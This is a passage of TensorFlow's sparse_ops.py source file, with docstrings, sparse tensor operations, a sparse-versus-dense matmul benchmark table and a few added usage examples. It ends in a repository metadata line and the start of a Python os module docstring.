output_shape_tensor = math_ops.maximum(
array_ops.constant(0, dtype=dtypes.int64),
math_ops.add(dim_low_bound, array_ops.ones_like(in_shape)))
else:
output_shape_tensor = ops.convert_to_tensor(new_shape)
output_shape_tensor.get_shape().assert_has_rank(1)
output_shape_tensor = math_ops.cast(output_shape_tensor, dtypes.int64)
# For cases when shape is known during graph construction, this catches the
# error before the sparse_tensor.SparseTensor catches it.
output_shape_tensor.get_shape()[0].merge_with(in_shape.get_shape()[0])
output_shape_tensor_const = tensor_util.constant_value(output_shape_tensor)
# For cases where all shapes are known during graph construction
if (output_shape_tensor_const is not None and
sp_input.get_shape().is_fully_defined()):
in_shape_const = np.array(sp_input.get_shape().as_list())
if not np.all(in_shape_const <= output_shape_tensor_const):
raise ValueError(
"Requested new_shape should have dimension sizes >= sp_input.shape."
" Found new_shape (%s), sp_input.shape (%s)." %
(in_shape_const, output_shape_tensor_const))
output_shape_tensor = output_shape_tensor_const
else:
# For cases where shape is not known during graph construction.
output_shape_tensor = control_flow_ops.with_dependencies([
check_ops.assert_equal(
array_ops.shape(in_shape), array_ops.shape(output_shape_tensor))
], output_shape_tensor)
output_shape_tensor = control_flow_ops.with_dependencies(
[check_ops.assert_less_equal(in_shape, output_shape_tensor)],
output_shape_tensor)
return sparse_tensor.SparseTensor(in_indices, in_values, output_shape_tensor)
@tf_export("sparse_fill_empty_rows")
def sparse_fill_empty_rows(sp_input, default_value, name=None):
"""Fills empty rows in the input 2-D `SparseTensor` with a default value.
This op adds entries with the specified `default_value` at index
`[row, 0]` for any row in the input that does not already have a value.
For example, suppose `sp_input` has shape `[5, 6]` and non-empty values:
[0, 1]: a
[0, 3]: b
[2, 0]: c
[3, 1]: d
Rows 1 and 4 are empty, so the output will be of shape `[5, 6]` with values:
[0, 1]: a
[0, 3]: b
[1, 0]: default_value
[2, 0]: c
[3, 1]: d
[4, 0]: default_value
Note that the input may have empty columns at the end, with no effect on
this op.
The output `SparseTensor` will be in row-major order and will have the
same shape as the input.
This op also returns an indicator vector such that
empty_row_indicator[i] = True iff row i was an empty row.
Args:
sp_input: A `SparseTensor` with shape `[N, M]`.
default_value: The value to fill for empty rows, with the same type as
`sp_input.`
name: A name prefix for the returned tensors (optional)
Returns:
sp_ordered_output: A `SparseTensor` with shape `[N, M]`, and with all empty
rows filled in with `default_value`.
empty_row_indicator: A bool vector of length `N` indicating whether each
input row was empty.
Raises:
TypeError: If `sp_input` is not a `SparseTensor`.
"""
sp_input = _convert_to_sparse_tensor(sp_input)
with ops.name_scope(name, "SparseFillEmptyRows", [sp_input]):
default_value = ops.convert_to_tensor(
default_value, dtype=sp_input.values.dtype)
(output_indices, output_values, empty_row_indicator,
unused_reverse_index_map) = gen_sparse_ops.sparse_fill_empty_rows(
indices=sp_input.indices,
values=sp_input.values,
dense_shape=sp_input.dense_shape,
default_value=default_value)
return (sparse_tensor.SparseTensor(
indices=output_indices,
values=output_values,
dense_shape=sp_input.dense_shape), empty_row_indicator)
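# --- Editor's illustrative sketch (not part of the original module): fills the
# --- empty rows of the [5, 6] SparseTensor from the `sparse_fill_empty_rows`
# --- docstring with a sentinel value. The helper name is hypothetical.
def _example_sparse_fill_empty_rows_usage():
  """Fills rows 1 and 4 of a [5, 6] SparseTensor with -1.0 (sketch)."""
  sp = sparse_tensor.SparseTensor(
      indices=[[0, 1], [0, 3], [2, 0], [3, 1]],
      values=[1.0, 2.0, 3.0, 4.0],
      dense_shape=[5, 6])
  filled, empty_row_indicator = sparse_fill_empty_rows(sp, default_value=-1.0)
  # `filled` gains entries [1, 0]: -1.0 and [4, 0]: -1.0, and
  # `empty_row_indicator` evaluates to [False, True, False, False, True].
  return filled, empty_row_indicator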
@tf_export("serialize_sparse")
def serialize_sparse(sp_input, name=None, out_type=dtypes.string):
"""Serialize a `SparseTensor` into a 3-vector (1-D `Tensor`) object.
Args:
sp_input: The input `SparseTensor`.
name: A name prefix for the returned tensors (optional).
out_type: The `dtype` to use for serialization.
Returns:
A 3-vector (1-D `Tensor`), with each column representing the serialized
`SparseTensor`'s indices, values, and shape (respectively).
Raises:
TypeError: If `sp_input` is not a `SparseTensor`.
"""
sp_input = _convert_to_sparse_tensor(sp_input)
return gen_sparse_ops.serialize_sparse(
sp_input.indices,
sp_input.values,
sp_input.dense_shape,
name=name,
out_type=out_type)
@tf_export("serialize_many_sparse")
def serialize_many_sparse(sp_input, name=None, out_type=dtypes.string):
"""Serialize `N`-minibatch `SparseTensor` into an `[N, 3]` `Tensor`.
The `SparseTensor` must have rank `R` greater than 1, and the first dimension
is treated as the minibatch dimension. Elements of the `SparseTensor`
must be sorted in increasing order of this first dimension. The serialized
`SparseTensor` objects going into each row of the output `Tensor` will have
rank `R-1`.
The minibatch size `N` is extracted from `sparse_shape[0]`.
Args:
sp_input: The input rank `R` `SparseTensor`.
name: A name prefix for the returned tensors (optional).
out_type: The `dtype` to use for serialization.
Returns:
A matrix (2-D `Tensor`) with `N` rows and `3` columns. Each column
represents serialized `SparseTensor`'s indices, values, and shape
(respectively).
Raises:
TypeError: If `sp_input` is not a `SparseTensor`.
"""
sp_input = _convert_to_sparse_tensor(sp_input)
return gen_sparse_ops.serialize_many_sparse(
sp_input.indices,
sp_input.values,
sp_input.dense_shape,
name=name,
out_type=out_type)
def deserialize_sparse(serialized_sparse, dtype, rank=None, name=None):
"""Deserialize `SparseTensor` objects.
The input `serialized_sparse` must have the shape `[?, ?, ..., ?, 3]` where
the last dimension stores serialized `SparseTensor` objects and the other N
dimensions (N >= 0) correspond to a batch. The ranks of the original
`SparseTensor` objects must all match. When the final `SparseTensor` is
created, its rank is the rank of the incoming `SparseTensor` objects plus N;
the sparse tensors have been concatenated along new dimensions, one for each
batch.
The output `SparseTensor` object's shape values for the original dimensions
are the max across the input `SparseTensor` objects' shape values for the
corresponding dimensions. The new dimensions match the size of the batch.
The input `SparseTensor` objects' indices are assumed ordered in
standard lexicographic order. If this is not the case, after this
step run `SparseReorder` to restore index ordering.
For example, if the serialized input is a `[2 x 3]` matrix representing two
original `SparseTensor` objects:
index = [ 0]
[10]
[20]
values = [1, 2, 3]
shape = [50]
and
index = [ 2]
[10]
values = [4, 5]
shape = [30]
then the final deserialized `SparseTensor` will be:
index = [0 0]
[0 10]
[0 20]
[1 2]
[1 10]
values = [1, 2, 3, 4, 5]
shape = [2 50]
Args:
serialized_sparse: The serialized `SparseTensor` objects.
The last dimension must have 3 columns.
dtype: The `dtype` of the serialized `SparseTensor` objects.
rank: (optional) Python int, the rank of the `SparseTensor` objects.
name: A name prefix for the returned tensors (optional).
Returns:
A `SparseTensor` representing the deserialized `SparseTensor` objects.
"""
output_indices, output_values, output_shape = (
gen_sparse_ops.deserialize_sparse(serialized_sparse, dtype, name=name))
# Feed rank data back in, if available
output_indices.set_shape([None, rank])
output_shape.set_shape([rank])
return sparse_tensor.SparseTensor(output_indices, output_values, output_shape)
@tf_export("deserialize_many_sparse")
def deserialize_many_sparse(serialized_sparse, dtype, rank=None, name=None):
"""Deserialize and concatenate `SparseTensors` from a serialized minibatch.
The input `serialized_sparse` must be a string matrix of shape `[N x 3]` where
`N` is the minibatch size and the rows correspond to packed outputs of
`serialize_sparse`. The ranks of the original `SparseTensor` objects
must all match. When the final `SparseTensor` is created, it has rank one
higher than the ranks of the incoming `SparseTensor` objects (they have been
concatenated along a new row dimension).
The output `SparseTensor` object's shape values for all dimensions but the
first are the max across the input `SparseTensor` objects' shape values
for the corresponding dimensions. Its first shape value is `N`, the minibatch
size.
The input `SparseTensor` objects' indices are assumed ordered in
standard lexicographic order. If this is not the case, after this
step run `sparse_reorder` to restore index ordering.
For example, if the serialized input is a `[2, 3]` matrix representing two
original `SparseTensor` objects:
index = [ 0]
[10]
[20]
values = [1, 2, 3]
shape = [50]
and
index = [ 2]
[10]
values = [4, 5]
shape = [30]
then the final deserialized `SparseTensor` will be:
index = [0 0]
[0 10]
[0 20]
[1 2]
[1 10]
values = [1, 2, 3, 4, 5]
shape = [2 50]
Args:
serialized_sparse: 2-D `Tensor` of type `string` of shape `[N, 3]`.
The serialized and packed `SparseTensor` objects.
dtype: The `dtype` of the serialized `SparseTensor` objects.
rank: (optional) Python int, the rank of the `SparseTensor` objects.
name: A name prefix for the returned tensors (optional)
Returns:
A `SparseTensor` representing the deserialized `SparseTensor`s,
concatenated along the `SparseTensor`s' first dimension.
All of the serialized `SparseTensor`s must have had the same rank and type.
"""
output_indices, output_values, output_shape = (
gen_sparse_ops.deserialize_many_sparse(
serialized_sparse, dtype, name=name))
# Feed rank data back in, if available
output_indices.set_shape([None, rank])
output_shape.set_shape([rank])
return sparse_tensor.SparseTensor(output_indices, output_values, output_shape)
@tf_export("sparse_tensor_dense_matmul")
def sparse_tensor_dense_matmul(sp_a,
b,
adjoint_a=False,
adjoint_b=False,
name=None):
# pylint: disable=line-too-long
"""Multiply SparseTensor (of rank 2) "A" by dense matrix "B".
No validity checking is performed on the indices of `A`. However, the
following input format is recommended for optimal behavior:
* If `adjoint_a == false`: `A` should be sorted in lexicographically
increasing order. Use `sparse_reorder` if you're not sure.
* If `adjoint_a == true`: `A` should be sorted in order of increasing
dimension 1 (i.e., "column major" order instead of "row major" order).
Using `tf.nn.embedding_lookup_sparse` for sparse multiplication:
It's not obvious but you can consider `embedding_lookup_sparse` as another
sparse and dense multiplication. In some situations, you may prefer to use
`embedding_lookup_sparse` even though you're not dealing with embeddings.
There are two questions to ask in the decision process: Do you need gradients
computed as sparse too? Is your sparse data represented as two
`SparseTensor`s: ids and values? There is more explanation about data format
below. If you answer any of these questions as yes, consider using
`tf.nn.embedding_lookup_sparse`.
Following explains differences between the expected SparseTensors:
For example if dense form of your sparse data has shape `[3, 5]` and values:
[[ a ]
[b c]
[ d ]]
`SparseTensor` format expected by `sparse_tensor_dense_matmul`:
`sp_a` (indices, values):
[0, 1]: a
[1, 0]: b
[1, 4]: c
[2, 2]: d
`SparseTensor` format expected by `embedding_lookup_sparse`:
`sp_ids` `sp_weights`
[0, 0]: 1 [0, 0]: a
[1, 0]: 0 [1, 0]: b
[1, 1]: 4 [1, 1]: c
[2, 0]: 2 [2, 0]: d
Deciding when to use `sparse_tensor_dense_matmul` vs.
`matmul`(a_is_sparse=True):
There are a number of questions to ask in the decision process, including:
* Will the SparseTensor `A` fit in memory if densified?
* Is the column count of the product large (>> 1)?
* Is the density of `A` larger than approximately 15%?
If the answer to several of these questions is yes, consider
converting the `SparseTensor` to a dense one and using `tf.matmul` with
`a_is_sparse=True`.
  This operation tends to perform well when `A` is more sparse, when the column
  size of the product is small (e.g. matrix-vector multiplication), or when
  `sp_a.dense_shape` takes on large values.
Below is a rough speed comparison between `sparse_tensor_dense_matmul`,
labeled 'sparse', and `matmul`(a_is_sparse=True), labeled 'dense'. For
purposes of the comparison, the time spent converting from a `SparseTensor` to
a dense `Tensor` is not included, so it is overly conservative with respect to
the time ratio.
Benchmark system:
CPU: Intel Ivybridge with HyperThreading (6 cores) dL1:32KB dL2:256KB dL3:12MB
GPU: NVidia Tesla k40c
Compiled with:
`-c opt --config=cuda --copt=-mavx`
```
tensorflow/python/sparse_tensor_dense_matmul_op_test --benchmarks
A sparse [m, k] with % nonzero values between 1% and 80%
B dense [k, n]
% nnz n gpu m k dt(dense) dt(sparse) dt(sparse)/dt(dense)
0.01 1 True 100 100 0.000221166 0.00010154 0.459112
0.01 1 True 100 1000 0.00033858 0.000109275 0.322745
0.01 1 True 1000 100 0.000310557 9.85661e-05 0.317385
0.01 1 True 1000 1000 0.0008721 0.000100875 0.115669
0.01 1 False 100 100 0.000208085 0.000107603 0.51711
0.01 1 False 100 1000 0.000327112 9.51118e-05 0.290762
0.01 1 False 1000 100 0.000308222 0.00010345 0.335635
0.01 1 False 1000 1000 0.000865721 0.000101397 0.117124
0.01 10 True 100 100 0.000218522 0.000105537 0.482958
0.01 10 True 100 1000 0.000340882 0.000111641 0.327506
0.01 10 True 1000 100 0.000315472 0.000117376 0.372064
0.01 10 True 1000 1000 0.000905493 0.000123263 0.136128
0.01 10 False 100 100 0.000221529 9.82571e-05 0.44354
0.01 10 False 100 1000 0.000330552 0.000112615 0.340687
0.01 10 False 1000 100 0.000341277 0.000114097 0.334324
0.01 10 False 1000 1000 0.000819944 0.000120982 0.147549
0.01 25 True 100 100 0.000207806 0.000105977 0.509981
0.01 25 True 100 1000 0.000322879 0.00012921 0.400181
0.01 25 True 1000 100 0.00038262 0.00014158 0.370035
0.01 25 True 1000 1000 0.000865438 0.000202083 0.233504
0.01 25 False 100 100 0.000209401 0.000104696 0.499979
0.01 25 False 100 1000 0.000321161 0.000130737 0.407076
0.01 25 False 1000 100 0.000377012 0.000136801 0.362856
0.01 25 False 1000 1000 0.000861125 0.00020272 0.235413
0.2 1 True 100 100 0.000206952 9.69219e-05 0.46833
0.2 1 True 100 1000 0.000348674 0.000147475 0.422959
0.2 1 True 1000 100 0.000336908 0.00010122 0.300439
0.2 1 True 1000 1000 0.001022 0.000203274 0.198898
0.2 1 False 100 100 0.000207532 9.5412e-05 0.459746
0.2 1 False 100 1000 0.000356127 0.000146824 0.41228
0.2 1 False 1000 100 0.000322664 0.000100918 0.312764
0.2 1 False 1000 1000 0.000998987 0.000203442 0.203648
0.2 10 True 100 100 0.000211692 0.000109903 0.519165
0.2 10 True 100 1000 0.000372819 0.000164321 0.440753
0.2 10 True 1000 100 0.000338651 0.000144806 0.427596
0.2 10 True 1000 1000 0.00108312 0.000758876 0.70064
0.2 10 False 100 100 0.000215727 0.000110502 0.512231
0.2 10 False 100 1000 0.000375419 0.0001613 0.429653
0.2 10 False 1000 100 0.000336999 0.000145628 0.432132
0.2 10 False 1000 1000 0.00110502 0.000762043 0.689618
0.2 25 True 100 100 0.000218705 0.000129913 0.594009
0.2 25 True 100 1000 0.000394794 0.00029428 0.745402
0.2 25 True 1000 100 0.000404483 0.0002693 0.665788
0.2 25 True 1000 1000 0.0012002 0.00194494 1.62052
0.2 25 False 100 100 0.000221494 0.0001306 0.589632
0.2 25 False 100 1000 0.000396436 0.000297204 0.74969
0.2 25 False 1000 100 0.000409346 0.000270068 0.659754
0.2 25 False 1000 1000 0.00121051 0.00193737 1.60046
0.5 1 True 100 100 0.000214981 9.82111e-05 0.456836
0.5 1 True 100 1000 0.000415328 0.000223073 0.537101
0.5 1 True 1000 100 0.000358324 0.00011269 0.314492
0.5 1 True 1000 1000 0.00137612 0.000437401 0.317851
0.5 1 False 100 100 0.000224196 0.000101423 0.452386
0.5 1 False 100 1000 0.000400987 0.000223286 0.556841
0.5 1 False 1000 100 0.000368825 0.00011224 0.304318
0.5 1 False 1000 1000 0.00136036 0.000429369 0.31563
0.5 10 True 100 100 0.000222125 0.000112308 0.505608
0.5 10 True 100 1000 0.000461088 0.00032357 0.701753
0.5 10 True 1000 100 0.000394624 0.000225497 0.571422
0.5 10 True 1000 1000 0.00158027 0.00190898 1.20801
0.5 10 False 100 100 0.000232083 0.000114978 0.495418
0.5 10 False 100 1000 0.000454574 0.000324632 0.714146
0.5 10 False 1000 100 0.000379097 0.000227768 0.600817
0.5 10 False 1000 1000 0.00160292 0.00190168 1.18638
0.5 25 True 100 100 0.00023429 0.000151703 0.647501
0.5 25 True 100 1000 0.000497462 0.000598873 1.20386
0.5 25 True 1000 100 0.000460778 0.000557038 1.20891
0.5 25 True 1000 1000 0.00170036 0.00467336 2.74845
0.5 25 False 100 100 0.000228981 0.000155334 0.678371
0.5 25 False 100 1000 0.000496139 0.000620789 1.25124
0.5 25 False 1000 100 0.00045473 0.000551528 1.21287
0.5 25 False 1000 1000 0.00171793 0.00467152 2.71927
0.8 1 True 100 100 0.000222037 0.000105301 0.47425
0.8 1 True 100 1000 0.000410804 0.000329327 0.801664
0.8 1 True 1000 100 0.000349735 0.000131225 0.375212
0.8 1 True 1000 1000 0.00139219 0.000677065 0.48633
0.8 1 False 100 100 0.000214079 0.000107486 0.502085
0.8 1 False 100 1000 0.000413746 0.000323244 0.781261
0.8 1 False 1000 100 0.000348983 0.000131983 0.378193
0.8 1 False 1000 1000 0.00136296 0.000685325 0.50282
0.8 10 True 100 100 0.000229159 0.00011825 0.516017
0.8 10 True 100 1000 0.000498845 0.000532618 1.0677
0.8 10 True 1000 100 0.000383126 0.00029935 0.781336
0.8 10 True 1000 1000 0.00162866 0.00307312 1.88689
0.8 10 False 100 100 0.000230783 0.000124958 0.541452
0.8 10 False 100 1000 0.000493393 0.000550654 1.11606
0.8 10 False 1000 100 0.000377167 0.000298581 0.791642
0.8 10 False 1000 1000 0.00165795 0.00305103 1.84024
0.8 25 True 100 100 0.000233496 0.000175241 0.75051
0.8 25 True 100 1000 0.00055654 0.00102658 1.84458
0.8 25 True 1000 100 0.000463814 0.000783267 1.68875
0.8 25 True 1000 1000 0.00186905 0.00755344 4.04132
0.8 25 False 100 100 0.000240243 0.000175047 0.728625
0.8 25 False 100 1000 0.000578102 0.00104499 1.80763
0.8 25 False 1000 100 0.000485113 0.000776849 1.60138
0.8 25 False 1000 1000 0.00211448 0.00752736 3.55992
```
Args:
sp_a: SparseTensor A, of rank 2.
b: A dense Matrix with the same dtype as sp_a.
adjoint_a: Use the adjoint of A in the matrix multiply. If A is complex,
this is transpose(conj(A)). Otherwise it's transpose(A).
adjoint_b: Use the adjoint of B in the matrix multiply. If B is complex,
this is transpose(conj(B)). Otherwise it's transpose(B).
name: A name prefix for the returned tensors (optional)
Returns:
A dense matrix (pseudo-code in dense np.matrix notation):
`A = A.H if adjoint_a else A`
`B = B.H if adjoint_b else B`
`return A*B`
"""
# pylint: enable=line-too-long
sp_a = _convert_to_sparse_tensor(sp_a)
with ops.name_scope(name, "SparseTensorDenseMatMul",
[sp_a.indices, sp_a.values, b]) as name:
b = ops.convert_to_tensor(b, name="b")
return gen_sparse_ops.sparse_tensor_dense_mat_mul(
a_indices=sp_a.indices,
a_values=sp_a.values,
a_shape=sp_a.dense_shape,
b=b,
adjoint_a=adjoint_a,
adjoint_b=adjoint_b)
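# --- Editor's illustrative sketch (not part of the original module):
# --- multiplies a rank-2 [3, 5] SparseTensor by a dense [5, 2] matrix with
# --- `sparse_tensor_dense_matmul`. The helper name is hypothetical.
def _example_sparse_tensor_dense_matmul_usage():
  """Computes a [3, 2] dense product of a sparse A and dense B (sketch)."""
  sp_a = sparse_tensor.SparseTensor(
      indices=[[0, 1], [1, 0], [1, 4], [2, 2]],
      values=[1.0, 2.0, 3.0, 4.0],
      dense_shape=[3, 5])
  b = ops.convert_to_tensor(
      [[1.0, 0.0], [0.0, 1.0], [1.0, 1.0], [0.0, 0.0], [2.0, 2.0]],
      dtype=dtypes.float32)
  # Indices of `sp_a` are already in lexicographic order, so no reorder is
  # needed; the result is an ordinary dense [3, 2] Tensor.
  return sparse_tensor_dense_matmul(sp_a, b)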
@tf_export("sparse_softmax")
def sparse_softmax(sp_input, name=None):
"""Applies softmax to a batched N-D `SparseTensor`.
The inputs represent an N-D SparseTensor with logical shape `[..., B, C]`
(where `N >= 2`), and with indices sorted in the canonical lexicographic
order.
This op is equivalent to applying the normal `tf.nn.softmax()` to each
innermost logical submatrix with shape `[B, C]`, but with the catch that *the
implicitly zero elements do not participate*. Specifically, the algorithm is
equivalent to:
(1) Applies `tf.nn.softmax()` to a densified view of each innermost
submatrix with shape `[B, C]`, along the size-C dimension;
(2) Masks out the original implicitly-zero locations;
(3) Renormalizes the remaining elements.
Hence, the `SparseTensor` result has exactly the same non-zero indices and
shape.
Example:
```python
# First batch:
# [? e.]
# [1. ? ]
# Second batch:
# [e ? ]
# [e e ]
shape = [2, 2, 2] # 3-D SparseTensor
values = np.asarray([[[0., np.e], [1., 0.]], [[np.e, 0.], [np.e, np.e]]])
indices = np.vstack(np.where(values)).astype(np.int64).T
result = tf.sparse_softmax(tf.SparseTensor(indices, values, shape))
# ...returning a 3-D SparseTensor, equivalent to:
# [? 1.] [1 ?]
# [1. ? ] and [.5 .5]
# where ? means implicitly zero.
```
Args:
sp_input: N-D `SparseTensor`, where `N >= 2`.
name: optional name of the operation.
Returns:
output: N-D `SparseTensor` representing the results.
"""
with ops.name_scope(name, "SparseSoftmax",
[sp_input.indices, sp_input.values]) as name:
out_vals = gen_sparse_ops.sparse_softmax(sp_input.indices, sp_input.values,
sp_input.dense_shape)
return sparse_tensor.SparseTensor(sp_input.indices, out_vals,
sp_input.dense_shape)
@tf_export("sparse_maximum")
def sparse_maximum(sp_a, sp_b, name=None):
"""Returns the element-wise max of two SparseTensors.
Assumes the two SparseTensors have the same shape, i.e., no broadcasting.
Example:
```python
sp_zero = sparse_tensor.SparseTensor([[0]], [0], [7])
sp_one = sparse_tensor.SparseTensor([[1]], [1], [7])
res = tf.sparse_maximum(sp_zero, sp_one).eval()
# "res" should be equal to SparseTensor([[0], [1]], [0, 1], [7]).
```
Args:
sp_a: a `SparseTensor` operand whose dtype is real, and indices
lexicographically ordered.
sp_b: the other `SparseTensor` operand with the same requirements (and the
same shape).
name: optional name of the operation.
Returns:
output: the output SparseTensor.
"""
with ops.name_scope(
name, "SparseSparseMaximum",
[sp_a.indices, sp_a.values, sp_b.indices, sp_b.values]) as name:
out_indices, out_values = gen_sparse_ops.sparse_sparse_maximum(
sp_a.indices,
sp_a.values,
sp_a.dense_shape,
sp_b.indices,
sp_b.values,
sp_b.dense_shape,
name=name)
return sparse_tensor.SparseTensor(out_indices, out_values, sp_a.dense_shape)
@tf_export("sparse_minimum")
def sparse_minimum(sp_a, sp_b, name=None):
"""Returns the element-wise min of two SparseTensors.
Assumes the two SparseTensors have the same shape, i.e., no broadcasting.
Example:
```python
sp_zero = sparse_tensor.SparseTensor([[0]], [0], [7])
sp_one = sparse_tensor.SparseTensor([[1]], [1], [7])
res = tf.sparse_minimum(sp_zero, sp_one).eval()
# "res" should be equal to SparseTensor([[0], [1]], [0, 0], [7]).
```
Args:
sp_a: a `SparseTensor` operand whose dtype is real, and indices
lexicographically ordered.
sp_b: the other `SparseTensor` operand with the same requirements (and the
same shape).
name: optional name of the operation.
Returns:
output: the output SparseTensor.
"""
with ops.name_scope(
name, "SparseSparseMinimum",
[sp_a.indices, sp_a.values, sp_b.indices, sp_b.values]) as name:
out_indices, out_values = gen_sparse_ops.sparse_sparse_minimum(
sp_a.indices,
sp_a.values,
sp_a.dense_shape,
sp_b.indices,
sp_b.values,
sp_b.dense_shape,
name=name)
return sparse_tensor.SparseTensor(out_indices, out_values, sp_a.dense_shape)
@tf_export("sparse_transpose")
def sparse_transpose(sp_input, perm=None, name=None):
"""Transposes a `SparseTensor`
The returned tensor's dimension i will correspond to the input dimension
`perm[i]`. If `perm` is not given, it is set to (n-1...0), where n is
the rank of the input tensor. Hence by default, this operation performs a
regular matrix transpose on 2-D input Tensors.
For example, if `sp_input` has shape `[4, 5]` and `indices` / `values`:
[0, 3]: b
[0, 1]: a
[3, 1]: d
[2, 0]: c
then the output will be a `SparseTensor` of shape `[5, 4]` and
`indices` / `values`:
[0, 2]: c
[1, 0]: a
[1, 3]: d
[3, 0]: b
Args:
sp_input: The input `SparseTensor`.
perm: A permutation of the dimensions of `sp_input`.
name: A name prefix for the returned tensors (optional)
Returns:
A transposed `SparseTensor`.
Raises:
TypeError: If `sp_input` is not a `SparseTensor`.
"""
with ops.name_scope(name, "SparseTranspose", [sp_input]) as name:
if perm is None:
rank = array_ops.rank(sp_input)
perm = (rank - 1) - math_ops.range(0, rank, 1)
indices = sp_input.indices
transposed_indices = array_ops.transpose(
array_ops.gather(array_ops.transpose(indices), perm))
perm_ = tensor_util.constant_value(ops.convert_to_tensor(perm))
if perm_ is not None and sp_input.get_shape().is_fully_defined():
old_shape_ = sp_input.get_shape().as_list()
transposed_dense_shape = list(old_shape_) # Copy.
for i, p in enumerate(perm_):
transposed_dense_shape[i] = old_shape_[p]
else:
dense_shape = sp_input.dense_shape
transposed_dense_shape = array_ops.gather(dense_shape, perm)
transposed_st = sparse_tensor.SparseTensor(
transposed_indices, sp_input.values, transposed_dense_shape)
transposed_st = sparse_reorder(transposed_st)
return transposed_st
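# --- Illustrative sketch (not part of the original module) ---
# A hedged example of `sparse_transpose`, mirroring the [4, 5] -> [5, 4] case
# in the docstring above. It only builds the op; evaluating the result would
# require a session (or eager execution). The values are placeholders chosen
# for illustration.
def _sparse_transpose_example():
  sp = sparse_tensor.SparseTensor(
      indices=[[0, 1], [0, 3], [2, 0], [3, 1]],
      values=[1, 2, 3, 4],
      dense_shape=[4, 5])
  # With the default perm, entry [i, j] moves to [j, i] and the shape flips.
  return sparse_transpose(sp)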
def _add_sparse_to_tensors_map(sp_input,
container=None,
shared_name=None,
name=None):
"""Add a `SparseTensor` to a `SparseTensorsMap` and return its handle.
Args:
sp_input: The input `SparseTensor`.
container: The container for the underlying `SparseTensorsMap` (optional).
shared_name: The shared name for the underlying `SparseTensorsMap`
(optional, defaults to the name of the newly created op).
name: A name prefix for the returned tensors (optional).
Returns:
A string 1-vector (1D `Tensor`), with the single element representing the
a unique handle to a `SparseTensor` stored by the `SparseTensorMap`
underlying this op.
Raises:
TypeError: If `sp_input` is not a `SparseTensor`.
"""
sp_input = _convert_to_sparse_tensor(sp_input)
return gen_sparse_ops.add_sparse_to_tensors_map(
sp_input.indices,
sp_input.values,
sp_input.dense_shape,
container=container,
shared_name=shared_name,
name=name)
def _add_many_sparse_to_tensors_map(sp_input,
container=None,
shared_name=None,
name=None):
"""Add a minibatch `SparseTensor` to a `SparseTensorsMap`, return `N` handles.
The `SparseTensor` must have rank `R` greater than 1, and the first dimension
is treated as the minibatch dimension. Elements of the `SparseTensor`
must be sorted in increasing order of this first dimension. The serialized
`SparseTensor` objects going into each row of the output `Tensor` will have
rank `R-1`.
The minibatch size `N` is extracted from `sparse_shape[0]`.
Args:
sp_input: The input rank `R` `SparseTensor`.
container: The container for the underlying `SparseTensorsMap` (optional).
shared_name: The shared name for the underlying `SparseTensorsMap`
(optional, defaults to the name of the newly created op).
name: A name prefix for the returned tensors (optional).
Returns:
A string matrix (2-D `Tensor`) with `N` rows and `1` column.
Each row represents a unique handle to a `SparseTensor` stored by
the `SparseTensorMap` underlying this op.
Raises:
TypeError: If `sp_input` is not a `SparseTensor`.
"""
sp_input = _convert_to_sparse_tensor(sp_input)
return gen_sparse_ops.add_many_sparse_to_tensors_map(
sp_input.indices,
sp_input.values,
sp_input.dense_shape,
container=container,
shared_name=shared_name,
name=name)
def _take_many_sparse_from_tensors_map(sparse_map_op,
sparse_handles,
rank=None,
name=None):
"""Read `SparseTensors` from a `SparseTensorsMap` and concatenate them.
The input `sparse_handles` must be a string matrix of shape `[N, 1]` where
`N` is the minibatch size and the rows correspond to packed outputs of
`add_sparse_to_tensors_map`. The ranks of the original `SparseTensor` objects
must all match. When the final `SparseTensor` is created, it has rank one
higher than the ranks of the incoming `SparseTensor` objects (they have been
concatenated along a new row dimension).
The output `SparseTensor` object's shape values for all dimensions but the
first are the max across the input `SparseTensor` objects' shape values
for the corresponding dimensions. Its first shape value is `N`, the minibatch
size.
The input `SparseTensor` objects' indices are assumed ordered in
standard lexicographic order. If this is not the case, after this
step run `sparse_reorder` to restore index ordering.
For example, if the serialized input is a `[2, 3]` matrix representing two
original `SparseTensor` objects:
index = [ 0]
[10]
[20]
values = [1, 2, 3]
shape = [50]
and
index = [ 2]
[10]
values = [4, 5]
shape = [30]
then the final deserialized `SparseTensor` will be:
index = [0 0]
[0 10]
[0 20]
[1 2]
[1 10]
values = [1, 2, 3, 4, 5]
shape = [2 50]
Args:
sparse_map_op: The `Operation` that created the original handles.
Usually this is, e.g., `add_sparse_to_tensors_map(...).op`.
sparse_handles: 2-D `Tensor` of type `string` of shape `[N, 1]`.
The serialized and packed `SparseTensor` objects.
rank: (optional) Python int, the rank of the `SparseTensor` objects.
name: A name prefix for the returned tensors (optional)
Returns:
A `SparseTensor` representing the deserialized `SparseTensor`s,
concatenated along the `SparseTensor`s' first dimension.
All of the serialized `SparseTensor`s must have had the same rank and type.
"""
if not isinstance(sparse_map_op, ops.Operation):
raise TypeError("sparse_map_op be an Operation")
if sparse_map_op.type not in ("AddSparseToTensorsMap",
"AddManySparseToTensorsMap"):
raise TypeError(
"sparse_map_op must be one of AddSparseToTensorsMap or "
"AddSparseToTensorsMap. Instead, found `%s`." % sparse_map_op.type)
with ops.colocate_with(sparse_map_op):
shared_name = sparse_map_op.get_attr("shared_name") or sparse_map_op.name
output_indices, output_values, output_shape = (
gen_sparse_ops.take_many_sparse_from_tensors_map(
sparse_handles,
dtype=sparse_map_op.get_attr("T"),
container=sparse_map_op.get_attr("container"),
shared_name=shared_name,
name=name))
# Feed rank data back in, if available
output_indices.set_shape([None, rank])
output_shape.set_shape([rank])
return sparse_tensor.SparseTensor(output_indices, output_values, output_shape)
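# --- Illustrative sketch (not part of the original module) ---
# A hedged example of the add/take round trip documented above: a two-row
# minibatch SparseTensor is stored in a SparseTensorsMap and then
# reconstituted. The shared name is purely illustrative, and evaluating the
# result requires a session.
def _tensors_map_roundtrip_example():
  sp = sparse_tensor.SparseTensor(
      indices=[[0, 0], [0, 10], [1, 2]], values=[1, 2, 3], dense_shape=[2, 50])
  handles = _add_many_sparse_to_tensors_map(sp, shared_name="example_map")
  # One handle per minibatch row goes in; a single [2, 50] SparseTensor comes
  # back out when the handles are read from the same map.
  return _take_many_sparse_from_tensors_map(handles.op, handles, rank=2)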
| eaplatanios/tensorflow | tensorflow/python/ops/sparse_ops.py | Python | apache-2.0 | 82,052 | 0.002803 |
r"""OS routines for Mac, NT, or Posix depending on what system we're on.
This exports:
- all functions from posix, nt, os2, or ce, e.g. unlink, stat, etc.
- os.path is one of the modules posixpath, or ntpath
- os.name is 'posix', 'nt', 'os2', 'ce' or 'riscos'
- os.curdir is a string representing the current directory ('.' or ':')
